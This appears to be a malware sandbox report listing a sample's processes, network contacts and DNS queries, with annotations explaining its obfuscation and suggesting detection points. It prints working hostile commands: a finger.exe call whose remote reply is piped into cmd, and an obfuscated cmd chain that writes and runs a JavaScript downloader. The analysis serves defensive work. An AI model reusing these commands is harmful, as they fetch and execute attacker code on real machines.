Technical Information
- '<SYSTEM32>\finger.exe' ok@tbeet3.mercadaochapaferro.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\v2x.js"
- %LOCALAPPDATA%\v2x.js
- 'tb####.##rcadaochapaferro.email':79
- 'je####.auztdwffpykp.bid':80
- 'cl###flare.com':443
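- 'microsoft.com':80
  (microsoft.com is a widely used legitimate domain. This list appears to record every host the sample contacted, so an entry here is observed traffic and not by itself an indicator of compromise.)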
- 'tb####.##rcadaochapaferro.email':79
- 'cl###flare.com':443
- DNS ASK tb####.##rcadaochapaferro.email
- DNS ASK je####.auztdwffpykp.bid
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
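- '<SYSTEM32>\cmd.exe' /c finger ok@tbeet3.mercadaochapaferro.email |more +2 |cmd
  (The reply of the remote finger service, TCP port 79 in the connection list above, is piped through `more +2`, which skips the first lines of the reply, and then into cmd, so the text the server returns is run as commands. Outbound connections from finger.exe are rare on most networks, which makes this process and port a useful detection point.)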
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt MCUV=.j&&SEt MUURL=vDfUsarDfUs a =DfUs 'scDfUsriDfUsptDfUs:'; b =DfUs 'hDfUsTtPDfUs:'; GDfUsetDfUsObjDfUsecDfUst(DfUsa+b+'&&sET ZNZ7=ESUPZESUPZjeuaua.auztdwffpykp.bidESUPZ?1ESUPZ')&...
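- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p LI0YZ="%MUURL:DfUs=%%ZNZ7:ESUPZ=/%" 0<nul 1>%LOCALAPPDATA%\v2x%MCUV%s"
  (DfUs and ESUPZ are filler strings: the %MUURL:DfUs=% substitution deletes the first and %ZNZ7:ESUPZ=/% turns the second into "/", which hides the script text and the URL from simple string matching. MCUV is set to ".j", so v2x%MCUV%s is the v2x.js file listed above. In the visible part of the preceding command the resulting script passes a script: URL on the auztdwffpykp.bid host to GetObject; that command line is truncated, so the rest is not shown.)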
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\v2x%MCUV%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\v2x.js